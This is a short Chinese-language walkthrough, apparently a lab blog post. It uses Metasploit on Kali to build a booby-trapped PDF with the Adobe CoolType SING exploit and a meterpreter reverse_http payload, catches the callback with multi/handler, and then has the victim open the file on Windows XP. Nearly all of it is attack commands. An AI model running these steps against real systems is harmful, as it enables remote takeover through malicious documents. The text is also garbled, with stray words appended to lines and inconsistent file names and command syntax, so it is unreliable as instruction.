IP:kali:192.168.1.102 windowsxp :192.168.1.119windows
msfconsole進入控制檯orm
使用命令爲 use windows/fileformat/adobe_cooltype_sing進入攻擊模塊blog
設置攻擊載荷payloads ,命令爲set payloads windows/meterpreter/reverse_httpit
使用命令show options來肯定須要修改的參數。io
使用命令exploit生成5333.pdfconsole
退出並從新進入msf平臺,使用命令 use exploit/multi/handler進入監聽模式,設置好參數,執行exploit等待被攻擊者的接聽。
把生成的5322.pdf移動到winxp裏面,並打開form
鏈接成功pdf